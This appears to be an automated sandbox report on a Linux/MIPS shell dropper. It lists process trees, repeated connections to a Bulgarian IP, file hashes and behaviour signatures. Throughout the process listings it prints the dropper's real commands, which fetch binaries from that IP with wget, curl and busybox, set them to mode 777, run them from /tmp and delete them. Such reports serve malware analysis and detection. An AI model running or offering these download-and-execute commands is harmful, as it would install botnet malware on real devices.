[wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-28 03:24
Reported
2024-10-28 03:27
Platform
debian9-mipsel-20240226-en
Max time kernel
129s
Max time network
133s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
Processes
/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh
[/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
